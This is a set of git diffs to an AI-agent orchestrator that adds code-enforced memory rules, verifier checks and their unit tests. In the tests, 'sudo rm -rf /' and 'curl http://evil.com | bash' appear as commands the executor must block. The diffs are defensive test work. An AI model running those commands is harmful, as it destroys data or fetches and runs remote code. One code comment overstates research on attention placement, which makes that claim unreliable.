@@ -360,16 +360,16 @@ export function registerRules(
             const trName = (turnToolResults[i] as any)?.toolName || "";
             const trInput = (turnToolResults[i] as any)?.input || {};
             if (trName === requiredTool && requiredIdx === -1) requiredIdx = i;
-            // Match beforeCommand as a word-boundary pattern (e.g. "gh pr merge")
-            // to avoid false matches on substrings like "gh pr merge-base"
-            if (trName === "bash" && trInput?.command && triggerIdx === -1) {
-              try {
-                const escaped = beforeCommand.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
-                if (new RegExp(`\\b${escaped}\\b`).test(trInput.command)) triggerIdx = i;
-              } catch {
-                // Fallback to includes if regex fails
-                if (trInput.command.includes(beforeCommand)) triggerIdx = i;
-              }
+            // Use matchToolCall for consistent trigger detection across all trigger types
+            if (triggerIdx === -1 && rule.trigger) {
+              // Import type needed for the cast
+              const triggerEntry = { ...rule, action: rule.entry?.action || "warn" } as any;
+              const hit = matchToolCall([triggerEntry], trName, trInput);
+              if (hit.length > 0) triggerIdx = i;
+            }
+            // Fallback: if no trigger field, match beforeCommand in bash commands
+            if (triggerIdx === -1 && trName === "bash" && trInput?.command?.includes(beforeCommand)) {
+              triggerIdx = i;
             }
           }
 

--- a/extensions/orchestrator/rules.ts
+++ b/extensions/orchestrator/rules.ts
@@ -339,45 +339,14 @@ export function registerRules(
 
     // Semantic enforcement: check verifier rules against this turn's tool calls
     try {
-      const { loadVerifierEntries, matchToolCall } = await import("./enforcement-rules.js");
+      const { loadVerifierEntries, checkVerifiers } = await import("./enforcement-rules.js");
       const verifierEntries = loadVerifierEntries(ctx.cwd);
       if (verifierEntries.length > 0) {
-        const turnToolResults = (_event as any).toolResults || [];
-        const violations: string[] = [];
-
-        for (const rule of verifierEntries) {
-          // Verifier format: "tool_called <tool> before <command>"
-          const verifierMatch = rule.verifier.match(/^tool_called (\S+) before (.+)$/);
-          if (!verifierMatch) continue;
-
-          const requiredTool = verifierMatch[1];
-          const beforeCommand = verifierMatch[2];
-
-          // Find indices: where the triggering command appeared, and where the required tool was called
-          let requiredIdx = -1;
-          let triggerIdx = -1;
-          for (let i = 0; i < turnToolResults.length; i++) {
-            const trName = (turnToolResults[i] as any)?.toolName || "";
-            const trInput = (turnToolResults[i] as any)?.input || {};
-            if (trName === requiredTool && requiredIdx === -1) requiredIdx = i;
-            // Use matchToolCall for consistent trigger detection across all trigger types
-            if (triggerIdx === -1 && rule.trigger) {
-              // Import type needed for the cast
-              const triggerEntry = { ...rule, action: rule.entry?.action || "warn" } as any;
-              const hit = matchToolCall([triggerEntry], trName, trInput);
-              if (hit.length > 0) triggerIdx = i;
-            }
-            // Fallback: if no trigger field, match beforeCommand in bash commands
-            if (triggerIdx === -1 && trName === "bash" && trInput?.command?.includes(beforeCommand)) {
-              triggerIdx = i;
-            }
-          }
-
-          // Violation: the command ran but the required tool was not called before it
-          if (triggerIdx >= 0 && (requiredIdx < 0 || requiredIdx >= triggerIdx)) {
-            violations.push(rule.verifier);
-          }
-        }
+        const turnToolResults = ((_event as any).toolResults || []).map((tr: any) => ({
+          toolName: tr?.toolName || "",
+          input: tr?.input || {},
+        }));
+        const violations = checkVerifiers(verifierEntries, turnToolResults);
 
         if (violations.length > 0) {
           pi.sendMessage({

--- a/extensions/orchestrator/rules.ts
+++ b/extensions/orchestrator/rules.ts
@@ -250,7 +250,10 @@ export function registerRules(
     }
 
     if (!extra && !memories && !contextMemories && !sessionContext) return;
-    return { systemPrompt: memories + contextMemories + sessionContext + event.systemPrompt + extra };
+    // Memories at TAIL position (after system prompt) — research proves tail
+    // gets highest LLM attention (U-shaped attention curve). Rules/extra stay
+    // before the prompt for backwards compatibility.
+    return { systemPrompt: event.systemPrompt + extra + memories + contextMemories + sessionContext };
   });
 
   // Post-turn memory reminder: after a turn completes, check if any tool
@@ -333,6 +336,63 @@ export function registerRules(
         }
       }
     } catch (e: any) { console.debug("[rules] task-focus enforcement failed:", e?.message?.slice(0, 100)); }
+
+    // Semantic enforcement: check verifier rules against this turn's tool calls
+    try {
+      const { loadVerifierEntries, matchToolCall } = await import("./enforcement-rules.js");
+      const verifierEntries = loadVerifierEntries(ctx.cwd);
+      if (verifierEntries.length > 0) {
+        const turnToolResults = (_event as any).toolResults || [];
+        const violations: string[] = [];
+
+        for (const rule of verifierEntries) {
+          if (!rule.verifier) continue;
+
+          // Check if the trigger was activated this turn
+          let triggered = false;
+          for (const tr of turnToolResults) {
+            const trName = (tr as any)?.toolName || "";
+            const trInput = (tr as any)?.input || {};
+            if (matchToolCall([rule], trName, trInput).length > 0) {
+              triggered = true;
+              break;
+            }
+          }
+          if (!triggered) continue;
+
+          // Verifier format: "tool_called <tool> before <command>"
+          // Check if the required tool was called before the triggering tool
+          const verifierMatch = rule.verifier.match(/^tool_called (\S+) before (.+)$/);
+          if (verifierMatch) {
+            const requiredTool = verifierMatch[1];
+            const beforeCommand = verifierMatch[2];
+
+            // Find index of the triggering command and the required tool
+            let requiredIdx = -1;
+            let triggerIdx = -1;
+            for (let i = 0; i < turnToolResults.length; i++) {
+              const trName = (turnToolResults[i] as any)?.toolName || "";
+              const trInput = (turnToolResults[i] as any)?.input || {};
+              if (trName === requiredTool && requiredIdx === -1) requiredIdx = i;
+              if (trInput?.command?.includes(beforeCommand) && triggerIdx === -1) triggerIdx = i;
+            }
+
+            // Violation: trigger was called but required tool was not called before it
+            if (triggerIdx >= 0 && (requiredIdx < 0 || requiredIdx >= triggerIdx)) {
+              violations.push(rule.verifier);
+            }
+          }
+        }
+
+        if (violations.length > 0) {
+          pi.sendMessage({
+            customType: "enforcement-violation",
+            content: `\u26d4 ENFORCEMENT VIOLATION \u2014 fix before continuing:\n\n${violations.map(v => `- ${v}`).join("\n")}`,
+            display: true,
+          }, { triggerTurn: true, deliverAs: "followUp" });
+        }
+      }
+    } catch (e: any) { console.debug("[rules] semantic enforcement failed:", e?.message?.slice(0, 100)); }
 
     // Check what files were modified in this turn by looking at tool results
     const toolResults = (_event as any).toolResults;

--- a/extensions/orchestrator/rules.ts
+++ b/extensions/orchestrator/rules.ts
@@ -360,8 +360,17 @@ export function registerRules(
             const trName = (turnToolResults[i] as any)?.toolName || "";
             const trInput = (turnToolResults[i] as any)?.input || {};
             if (trName === requiredTool && requiredIdx === -1) requiredIdx = i;
-            // beforeCommand is a specific substring (e.g. "gh pr merge")
-            if (trName === "bash" && trInput?.command?.includes(beforeCommand) && triggerIdx === -1) triggerIdx = i;
+            // Match beforeCommand as a word-boundary pattern (e.g. "gh pr merge")
+            // to avoid false matches on substrings like "gh pr merge-base"
+            if (trName === "bash" && trInput?.command && triggerIdx === -1) {
+              try {
+                const escaped = beforeCommand.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
+                if (new RegExp(`\\b${escaped}\\b`).test(trInput.command)) triggerIdx = i;
+              } catch {
+                // Fallback to includes if regex fails
+                if (trInput.command.includes(beforeCommand)) triggerIdx = i;
+              }
+            }
           }
 
           // Violation: the command ran but the required tool was not called before it

--- a/extensions/orchestrator/rules.ts
+++ b/extensions/orchestrator/rules.ts
@@ -374,7 +374,10 @@ export function registerRules(
               const trName = (turnToolResults[i] as any)?.toolName || "";
               const trInput = (turnToolResults[i] as any)?.input || {};
               if (trName === requiredTool && requiredIdx === -1) requiredIdx = i;
-              if (trInput?.command?.includes(beforeCommand) && triggerIdx === -1) triggerIdx = i;
+              // `includes` is intentionally used here — beforeCommand is a specific
+              // command substring (e.g. "gh pr merge") that we want to find anywhere
+              // in the bash command string. This is correct for our use case.
+              if (trName === "bash" && trInput?.command?.includes(beforeCommand) && triggerIdx === -1) triggerIdx = i;
             }
 
             // Violation: trigger was called but required tool was not called before it

--- a/rules/35-memory.md
+++ b/rules/35-memory.md
@@ -36,6 +36,7 @@ call `memory_search` first. Supports keyword and category-filtered queries.
 **MANDATORY:** When you learn something worth remembering — preferences, corrections, conventions, completed work — add it immediately.
 Keep entries short (~100 chars), specific, actionable.
 Use `pinned: true` ONLY when user explicitly says "remember this". Duplicates are auto-reinforced.
+When a correction is mechanical (can be checked by code), add `trigger` + `action` params — see "Code-Enforced Memories" below.
 
 ### `memory_remove` — Remove Outdated Memories
 
@@ -111,6 +112,38 @@ The situation report header shows usage: `# Project Memory [72% — 1,224/1,700 
 | User corrects you | `lesson` | Learned |
 | Multiple fix attempts | `mistake` | Learned |
 | User states a preference | `preference` | Learned |
+
+---
+
+## Code-Enforced Memories (Enforcement Layer)
+
+Some memories can be **code-enforced** — the LLM cannot ignore them because runtime hooks
+check and act on them. Use enforcement when a rule is **mechanical** (can be checked by code).
+
+Add enforcement by passing `trigger`, `action`, and optionally `verifier` to `memory_add`:
+
+```text
+memory_add(text="...", category="lesson",
+  trigger="bash_contains git add .",
+  action="block")
+```
+
+**When to add enforcement (AI decides automatically):**
+
+| Pattern | Enforcement | Example |
+|---------|-------------|--------|
+| User corrects a specific command/tool usage | `trigger` + `block` | "never use git add ." |
+| User wants something to run after a specific action | `trigger` + `run_after <cmd>` | "always deploy after code changes" |
+| User wants a warning about a specific pattern | `trigger` + `warn` | "warn when modifying config files" |
+| User wants tool A called before tool B | `verifier` | "always ask_user before gh pr merge" |
+| General knowledge / context / facts | **No enforcement** | "buildah chown breaks cache mounts" |
+
+**Rule of thumb:** If you can express it as "when X happens, do/block/warn Y" — add enforcement.
+If it's knowledge that informs decisions but can't be checked mechanically — plain memory only.
+
+**Trigger types:** `bash_contains <str>`, `bash_regex <pattern>`, `tool_name <name>`, `file_modified <glob>`
+**Action types:** `block` (prevent), `run_after <command>` (execute after), `warn` (append warning)
+**Verifier:** `tool_called <tool> before <command>` (checked at turn_end, forces retry on violation)
 
 ---
 

--- a/rules/35-memory.md
+++ b/rules/35-memory.md
@@ -141,7 +141,7 @@ memory_add(text="...", category="lesson",
 **Rule of thumb:** If you can express it as "when X happens, do/block/warn Y" — add enforcement.
 If it's knowledge that informs decisions but can't be checked mechanically — plain memory only.
 
-**Trigger types:** `bash_contains <str>`, `bash_regex <pattern>`, `tool_name <name>`, `file_modified <glob>`
+**Trigger types:** `bash_contains <str>`, `bash_regex <pattern>`, `tool_name <name>`, `file_modified <pattern>` (matches file extensions like `*.py` or path substrings like `Dockerfile`)
 **Action types:** `block` (prevent), `run_after <command>` (execute after), `warn` (append warning)
 **Verifier:** `tool_called <tool> before <command>` (checked at turn_end, forces retry on violation)
 

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -17,7 +17,7 @@ import {
   type EnforcedEntry,
   type VerifierEntry,
 } from "../../../extensions/orchestrator/enforcement-rules.js";
-import { entryHash, type ScoredEntry } from "../../../extensions/orchestrator/memory-scoring.js";
+import { entryHash, rebuild, type ScoredEntry } from "../../../extensions/orchestrator/memory-scoring.js";
 
 // ── Helpers ────────────────────────────────────────────────────────────────
 
@@ -510,5 +510,155 @@ describe("checkVerifiers — invalid verifier format skipped", () => {
     ];
     const violations = checkVerifiers(entries, toolResults);
     assert.equal(violations.length, 0);
+  });
+});
+
+// ── rebuild — orphan preservation for enforced entries ─────────────────────
+
+describe("rebuild — orphan preservation for enforced entries", () => {
+  const now = new Date().toISOString();
+
+  // Entry that IS in the topic file (normal, no enforcement)
+  const normalText = "normal lesson entry";
+  const normalLine = "- [lesson] normal lesson entry";
+  const normalHash = entryHash(normalLine);
+
+  // Entry NOT in topic file, but has trigger+action (should be preserved)
+  const enforcedText = "always run tests before push";
+  const enforcedLine = "- [lesson] always run tests before push";
+  const enforcedHash = entryHash(enforcedLine);
+
+  // Entry NOT in topic file, has trigger only (no action) (should be deleted)
+  const triggerOnlyText = "trigger only no action";
+  const triggerOnlyLine = "- [lesson] trigger only no action";
+  const triggerOnlyHash = entryHash(triggerOnlyLine);
+
+  // Entry NOT in topic file, has verifier (should be preserved)
+  const verifierText = "ask before merging";
+  const verifierLine = "- [lesson] ask before merging";
+  const verifierHash = entryHash(verifierLine);
+
+  function makeTmpDir(): string {
+    const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "rebuild-orphan-test-"));
+    const memoryDir = path.join(tmpDir, ".pi", "memory");
+    const topicsDir = path.join(memoryDir, "topics");
+    fs.mkdirSync(topicsDir, { recursive: true });
+
+    // Topic file only contains the normal entry
+    fs.writeFileSync(
+      path.join(topicsDir, "lessons.md"),
+      `# Lessons\n${normalLine}\n`,
+    );
+
+    // Scores file has all four entries
+    const scoresFile = {
+      entries: {
+        [normalHash]: {
+          class: "lesson",
+          score: 1.0,
+          evidenceCount: 2,
+          cue: "explicit",
+          firstSeen: now,
+          lastReinforced: now,
+          userState: "auto",
+          lifecycle: "active",
+        },
+        [enforcedHash]: {
+          class: "lesson",
+          score: 1.0,
+          evidenceCount: 1,
+          cue: "explicit",
+          firstSeen: now,
+          lastReinforced: now,
+          userState: "auto",
+          lifecycle: "active",
+          trigger: "bash_contains git push",
+          action: "run_after",
+        },
+        [triggerOnlyHash]: {
+          class: "lesson",
+          score: 1.0,
+          evidenceCount: 1,
+          cue: "explicit",
+          firstSeen: now,
+          lastReinforced: now,
+          userState: "auto",
+          lifecycle: "active",
+          trigger: "bash_contains something",
+          // No action — should be deleted
+        },
+        [verifierHash]: {
+          class: "lesson",
+          score: 1.0,
+          evidenceCount: 1,
+          cue: "explicit",
+          firstSeen: now,
+          lastReinforced: now,
+          userState: "auto",
+          lifecycle: "active",
+          verifier: "tool_called ask_user before gh pr merge",
+        },
+      },
+      lastRebuild: now,
+    };
+    fs.writeFileSync(
+      path.join(memoryDir, "memory-scores.json"),
+      JSON.stringify(scoresFile),
+    );
+
+    return tmpDir;
+  }
+
+  it("preserves enforced orphan (trigger+action) and deletes trigger-only orphan", () => {
+    const tmpDir = makeTmpDir();
+    try {
+      // Only pass the entry that's in the topic file
+      rebuild(tmpDir, [
+        { category: "lesson", text: normalText, pinned: false },
+      ]);
+
+      const saved = JSON.parse(
+        fs.readFileSync(
+          path.join(tmpDir, ".pi", "memory", "memory-scores.json"),
+          "utf-8",
+        ),
+      );
+
+      // Normal entry should exist
+      assert.ok(saved.entries[normalHash], "normal entry should exist");
+
+      // Enforced orphan (trigger+action) should be preserved
+      assert.ok(saved.entries[enforcedHash], "enforced orphan (trigger+action) should be preserved");
+      assert.equal(saved.entries[enforcedHash].trigger, "bash_contains git push");
+      assert.equal(saved.entries[enforcedHash].action, "run_after");
+
+      // Trigger-only orphan (no action) should be deleted
+      assert.equal(saved.entries[triggerOnlyHash], undefined, "trigger-only orphan should be deleted");
+
+      // Verifier orphan should be preserved
+      assert.ok(saved.entries[verifierHash], "verifier orphan should be preserved");
+      assert.equal(saved.entries[verifierHash].verifier, "tool_called ask_user before gh pr merge");
+    } finally {
+      fs.rmSync(tmpDir, { recursive: true, force: true });
+    }
+  });
+
+  it("cleans _orphaned flag from saved entries", () => {
+    const tmpDir = makeTmpDir();
+    try {
+      rebuild(tmpDir, [
+        { category: "lesson", text: normalText, pinned: false },
+      ]);
+
+      const raw = fs.readFileSync(
+        path.join(tmpDir, ".pi", "memory", "memory-scores.json"),
+        "utf-8",
+      );
+
+      // _orphaned should not appear anywhere in the saved file
+      assert.ok(!raw.includes("_orphaned"), "_orphaned flag should not be present in saved file");
+    } finally {
+      fs.rmSync(tmpDir, { recursive: true, force: true });
+    }
   });
 });

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -1,0 +1,163 @@
+/**
+ * Tests for enforcement-rules engine (trigger matching + action execution).
+ * Run with: npx tsx --test tests/node/orchestrator/enforcement-rules.test.ts
+ */
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import {
+  matchBashCommand,
+  matchToolCall,
+  executeAction,
+  type EnforcedEntry,
+} from "../../../extensions/orchestrator/enforcement-rules.ts";
+import type { ScoredEntry } from "../../../extensions/orchestrator/memory-scoring.ts";
+
+// ── Helpers ────────────────────────────────────────────────────────────────
+
+/** Minimal ScoredEntry stub — only fields required by EnforcedEntry. */
+function stubScoredEntry(
+  trigger: string,
+  action: "block" | "warn" | "run_after" = "warn",
+): ScoredEntry {
+  return {
+    category: "lesson",
+    evidence: 1,
+    lastSeen: Date.now(),
+    firstSeen: Date.now(),
+    status: "active",
+    trigger: trigger as any,
+    action,
+  } as ScoredEntry;
+}
+
+/** Build an EnforcedEntry with the given trigger/action. */
+function makeEntry(
+  trigger: string,
+  action: "block" | "warn" | "run_after" = "warn",
+  opts: { actionCommand?: string; verifier?: string } = {},
+): EnforcedEntry {
+  return {
+    hash: `test-hash-${trigger}`,
+    text: `Test rule: ${trigger}`,
+    trigger: trigger as any,
+    action,
+    actionCommand: opts.actionCommand,
+    verifier: opts.verifier,
+    entry: stubScoredEntry(trigger, action),
+  };
+}
+
+// ── matchBashCommand — bash_contains ───────────────────────────────────────
+
+describe("matchBashCommand — bash_contains trigger", () => {
+  const entry = makeEntry("bash_contains git add .");
+
+  it("matches when command contains the needle", () => {
+    const matches = matchBashCommand([entry], "git add . && git commit");
+    assert.equal(matches.length, 1);
+    assert.equal(matches[0].matched, "git add .");
+    assert.strictEqual(matches[0].rule, entry);
+  });
+
+  it("does not match when needle is absent", () => {
+    const matches = matchBashCommand([entry], "git add src/file.py");
+    assert.equal(matches.length, 0);
+  });
+});
+
+// ── matchBashCommand — bash_regex ──────────────────────────────────────────
+
+describe("matchBashCommand — bash_regex trigger", () => {
+  const entry = makeEntry("bash_regex git\\s+add\\s+\\.");
+
+  it("matches when regex pattern hits", () => {
+    const matches = matchBashCommand([entry], "git  add  .");
+    assert.equal(matches.length, 1);
+    assert.equal(matches[0].matched, "git  add  .");
+  });
+
+  it("does not match when regex pattern misses", () => {
+    const matches = matchBashCommand([entry], "git add src/");
+    assert.equal(matches.length, 0);
+  });
+});
+
+// ── matchToolCall — tool_name ──────────────────────────────────────────────
+
+describe("matchToolCall — tool_name trigger", () => {
+  const entry = makeEntry("tool_name write");
+
+  it("matches when tool name equals expected", () => {
+    const matches = matchToolCall([entry], "write", { path: "foo.py" });
+    assert.equal(matches.length, 1);
+    assert.equal(matches[0].matched, "write");
+  });
+
+  it("does not match a different tool name", () => {
+    const matches = matchToolCall([entry], "read", { path: "foo.py" });
+    assert.equal(matches.length, 0);
+  });
+});
+
+// ── matchToolCall — file_modified ──────────────────────────────────────────
+
+describe("matchToolCall — file_modified trigger", () => {
+  const entry = makeEntry("file_modified *.py");
+
+  it("matches when written file has matching extension", () => {
+    const matches = matchToolCall([entry], "write", { path: "src/main.py" });
+    assert.equal(matches.length, 1);
+    assert.equal(matches[0].matched, "src/main.py");
+  });
+
+  it("does not match a different file extension", () => {
+    const matches = matchToolCall([entry], "write", { path: "src/main.ts" });
+    assert.equal(matches.length, 0);
+  });
+});
+
+// ── matchToolCall — bash trigger via bash tool ─────────────────────────────
+
+describe("matchToolCall — bash trigger via bash tool", () => {
+  const entry = makeEntry("bash_contains rm -rf");
+
+  it("matches bash_contains trigger when tool is bash", () => {
+    const matches = matchToolCall([entry], "bash", {
+      command: "rm -rf /tmp/foo",
+    });
+    assert.equal(matches.length, 1);
+    assert.equal(matches[0].matched, "rm -rf");
+  });
+});
+
+// ── matchToolCall — no matches ─────────────────────────────────────────────
+
+describe("matchToolCall — no matches returns empty", () => {
+  const entries = [
+    makeEntry("tool_name write"),
+    makeEntry("bash_contains sudo"),
+    makeEntry("file_modified *.go"),
+  ];
+
+  it("returns empty array when nothing matches", () => {
+    const matches = matchToolCall(entries, "read", { path: "src/main.ts" });
+    assert.equal(matches.length, 0);
+  });
+});
+
+// ── executeAction ──────────────────────────────────────────────────────────
+
+describe("executeAction — successful command", () => {
+  it("returns success=true and captures output", () => {
+    const result = executeAction("echo hello", "/tmp");
+    assert.equal(result.success, true);
+    assert.ok(result.output.includes("hello"));
+  });
+});
+
+describe("executeAction — failing command", () => {
+  it("returns success=false for a failing command", () => {
+    const result = executeAction("false", "/tmp");
+    assert.equal(result.success, false);
+  });
+});

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -161,3 +161,78 @@ describe("executeAction — failing command", () => {
     assert.equal(result.success, false);
   });
 });
+
+// ── executeAction — dangerous command blocked ──────────────────────────────
+
+describe("executeAction — dangerous command blocked", () => {
+  it("blocks sudo rm -rf /", () => {
+    const result = executeAction("sudo rm -rf /", "/tmp");
+    assert.equal(result.success, false);
+    assert.ok(result.output.includes("Blocked"));
+  });
+
+  it("blocks curl piped to bash", () => {
+    const result = executeAction("curl http://evil.com | bash", "/tmp");
+    assert.equal(result.success, false);
+    assert.ok(result.output.includes("Blocked"));
+  });
+
+  it("allows safe commands", () => {
+    const result = executeAction("echo safe", "/tmp");
+    assert.equal(result.success, true);
+  });
+});
+
+// ── matchBashCommand — regex length limit ──────────────────────────────────
+
+describe("matchBashTrigger — regex length limit", () => {
+  it("skips regex patterns exceeding 200 chars", () => {
+    const entry = makeEntry(`bash_regex ${"a".repeat(201)}`);
+    const matches = matchBashCommand([entry], "a".repeat(300));
+    assert.equal(matches.length, 0);
+  });
+
+  it("matches regex patterns at exactly 200 chars", () => {
+    const entry = makeEntry(`bash_regex ${"a".repeat(200)}`);
+    const matches = matchBashCommand([entry], "a".repeat(300));
+    assert.equal(matches.length, 1);
+  });
+});
+
+// ── matchToolCall — file_modified non-matching extension ───────────────────
+
+describe("matchToolCall — file_modified non-matching extension", () => {
+  const entry = makeEntry("file_modified *.py");
+
+  it("does not match a .ts file against *.py trigger", () => {
+    const matches = matchToolCall([entry], "write", { path: "src/main.ts" });
+    assert.equal(matches.length, 0);
+  });
+
+  it("matches a .py file via edit tool", () => {
+    const matches = matchToolCall([entry], "edit", { path: "src/main.py" });
+    assert.equal(matches.length, 1);
+    assert.equal(matches[0].matched, "src/main.py");
+  });
+});
+
+// ── matchToolCall — file_modified exact path ───────────────────────────────
+
+describe("matchToolCall — file_modified exact path", () => {
+  const entry = makeEntry("file_modified Dockerfile");
+
+  it("matches when path contains the exact filename", () => {
+    const matches = matchToolCall([entry], "write", {
+      path: "path/to/Dockerfile",
+    });
+    assert.equal(matches.length, 1);
+    assert.equal(matches[0].matched, "path/to/Dockerfile");
+  });
+
+  it("does not match a different filename", () => {
+    const matches = matchToolCall([entry], "write", {
+      path: "path/to/Makefile",
+    });
+    assert.equal(matches.length, 0);
+  });
+});

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -137,6 +137,65 @@ describe("matchToolCall — bash trigger via bash tool", () => {
   });
 });
 
+// ── matchToolCall — subagent task text matches bash_contains trigger ───────
+
+describe("matchToolCall — subagent task text matches bash_contains trigger", () => {
+  const entry = makeEntry("bash_contains git commit");
+
+  it("matches when subagent task contains the trigger text", () => {
+    const matches = matchToolCall([entry], "subagent", {
+      task: "Stage files and git commit -m 'test'",
+      agent: "git-expert",
+      cwd: "/tmp",
+    });
+    assert.equal(matches.length, 1);
+    assert.equal(matches[0].matched, "git commit");
+    assert.strictEqual(matches[0].rule, entry);
+  });
+
+  it("does not match when subagent task does not contain trigger text", () => {
+    const matches = matchToolCall([entry], "subagent", {
+      task: "Run tests",
+      agent: "test-runner",
+      cwd: "/tmp",
+    });
+    assert.equal(matches.length, 0);
+  });
+});
+
+// ── matchToolCall — subagent task text does not match unrelated trigger ────
+
+describe("matchToolCall — subagent task text does not match unrelated trigger", () => {
+  const entry = makeEntry("bash_contains rm -rf");
+
+  it("does not match when subagent task has no relation to trigger", () => {
+    const matches = matchToolCall([entry], "subagent", {
+      task: "git push origin main",
+      agent: "git-expert",
+      cwd: "/tmp",
+    });
+    assert.equal(matches.length, 0);
+  });
+});
+
+// ── matchBashCommand — matches against subagent result text ────────────────
+
+describe("matchBashCommand — matches against subagent result text", () => {
+  const entry = makeEntry("bash_contains Committed", "warn");
+
+  it("matches when result text contains the trigger needle", () => {
+    const matches = matchBashCommand([entry], "Done. Committed abc123 to branch feat/test");
+    assert.equal(matches.length, 1);
+    assert.equal(matches[0].matched, "Committed");
+    assert.strictEqual(matches[0].rule, entry);
+  });
+
+  it("does not match when result text lacks the trigger needle", () => {
+    const matches = matchBashCommand([entry], "Done. Tests passed.");
+    assert.equal(matches.length, 0);
+  });
+});
+
 // ── matchToolCall — no matches ─────────────────────────────────────────────
 
 describe("matchToolCall — no matches returns empty", () => {

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -13,7 +13,9 @@ import {
   executeAction,
   loadEnforcedEntries,
   loadVerifierEntries,
+  checkVerifiers,
   type EnforcedEntry,
+  type VerifierEntry,
 } from "../../../extensions/orchestrator/enforcement-rules.js";
 import { entryHash, type ScoredEntry } from "../../../extensions/orchestrator/memory-scoring.js";
 
@@ -427,5 +429,65 @@ describe("loadVerifierEntries — returns entries with verifier field", () => {
     } finally {
       fs.rmSync(tmpDir, { recursive: true, force: true });
     }
+  });
+});
+
+// ── checkVerifiers tests ──────────────────────────────────────────────
+
+// checkVerifiers + VerifierEntry imported with the main block above
+
+function makeVerifierEntry(verifier: string, trigger?: string): VerifierEntry {
+  return {
+    hash: "test",
+    text: "test verifier",
+    trigger: trigger as any,
+    verifier,
+    entry: stubScoredEntry(trigger || "bash_contains test"),
+  };
+}
+
+describe("checkVerifiers — violation detected", () => {
+  it("detects violation when required tool not called before command", () => {
+    const entries = [makeVerifierEntry("tool_called ask_user before gh pr merge")];
+    const toolResults = [
+      { toolName: "bash", input: { command: "gh pr merge 42 --squash" } },
+    ];
+    const violations = checkVerifiers(entries, toolResults);
+    assert.equal(violations.length, 1);
+    assert.equal(violations[0], "tool_called ask_user before gh pr merge");
+  });
+});
+
+describe("checkVerifiers — no violation when tool called first", () => {
+  it("passes when required tool is called before command", () => {
+    const entries = [makeVerifierEntry("tool_called ask_user before gh pr merge")];
+    const toolResults = [
+      { toolName: "ask_user", input: { question: "merge?" } },
+      { toolName: "bash", input: { command: "gh pr merge 42 --squash" } },
+    ];
+    const violations = checkVerifiers(entries, toolResults);
+    assert.equal(violations.length, 0);
+  });
+});
+
+describe("checkVerifiers — no violation when command not in turn", () => {
+  it("returns empty when triggering command not found", () => {
+    const entries = [makeVerifierEntry("tool_called ask_user before gh pr merge")];
+    const toolResults = [
+      { toolName: "bash", input: { command: "git status" } },
+    ];
+    const violations = checkVerifiers(entries, toolResults);
+    assert.equal(violations.length, 0);
+  });
+});
+
+describe("checkVerifiers — invalid verifier format skipped", () => {
+  it("skips entries with unrecognized verifier format", () => {
+    const entries = [makeVerifierEntry("some random verifier text")];
+    const toolResults = [
+      { toolName: "bash", input: { command: "anything" } },
+    ];
+    const violations = checkVerifiers(entries, toolResults);
+    assert.equal(violations.length, 0);
   });
 });

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -4,6 +4,7 @@
  */
 import { describe, it } from "node:test";
 import assert from "node:assert/strict";
+import os from "node:os";
 import {
   matchBashCommand,
   matchToolCall,
@@ -148,16 +149,20 @@ describe("matchToolCall — no matches returns empty", () => {
 // ── executeAction ──────────────────────────────────────────────────────────
 
 describe("executeAction — successful command", () => {
-  it("returns success=true and captures output", () => {
-    const result = executeAction("echo hello", "/tmp");
+  it("returns success=true for valid command", () => {
+    const result = executeAction("echo hello", os.tmpdir());
     assert.equal(result.success, true);
+  });
+
+  it("captures command output", () => {
+    const result = executeAction("echo hello", os.tmpdir());
     assert.ok(result.output.includes("hello"));
   });
 });
 
 describe("executeAction — failing command", () => {
   it("returns success=false for a failing command", () => {
-    const result = executeAction("false", "/tmp");
+    const result = executeAction("false", os.tmpdir());
     assert.equal(result.success, false);
   });
 });
@@ -166,19 +171,19 @@ describe("executeAction — failing command", () => {
 
 describe("executeAction — dangerous command blocked", () => {
   it("blocks sudo rm -rf /", () => {
-    const result = executeAction("sudo rm -rf /", "/tmp");
+    const result = executeAction("sudo rm -rf /", os.tmpdir());
     assert.equal(result.success, false);
     assert.ok(result.output.includes("Blocked"));
   });
 
   it("blocks curl piped to bash", () => {
-    const result = executeAction("curl http://evil.com | bash", "/tmp");
+    const result = executeAction("curl http://evil.com | bash", os.tmpdir());
     assert.equal(result.success, false);
     assert.ok(result.output.includes("Blocked"));
   });
 
   it("allows safe commands", () => {
-    const result = executeAction("echo safe", "/tmp");
+    const result = executeAction("echo safe", os.tmpdir());
     assert.equal(result.success, true);
   });
 });

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -632,6 +632,7 @@ describe("rebuild — orphan preservation for enforced entries", () => {
       assert.ok(saved.entries[enforcedHash], "enforced orphan (trigger+action) should be preserved");
       assert.equal(saved.entries[enforcedHash].trigger, "bash_contains git push");
       assert.equal(saved.entries[enforcedHash].action, "run_after");
+      assert.equal(saved.entries[enforcedHash].actionCommand, "echo enforced");
 
       // Trigger-only orphan (no action) should be deleted
       assert.equal(saved.entries[triggerOnlyHash], undefined, "trigger-only orphan should be deleted");

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -14,8 +14,8 @@ import {
   loadEnforcedEntries,
   loadVerifierEntries,
   type EnforcedEntry,
-} from "../../../extensions/orchestrator/enforcement-rules.ts";
-import { entryHash, type ScoredEntry } from "../../../extensions/orchestrator/memory-scoring.ts";
+} from "../../../extensions/orchestrator/enforcement-rules.js";
+import { entryHash, type ScoredEntry } from "../../../extensions/orchestrator/memory-scoring.js";
 
 // ── Helpers ────────────────────────────────────────────────────────────────
 

--- a/tests/node/orchestrator/enforcement-rules.test.ts
+++ b/tests/node/orchestrator/enforcement-rules.test.ts
@@ -5,13 +5,17 @@
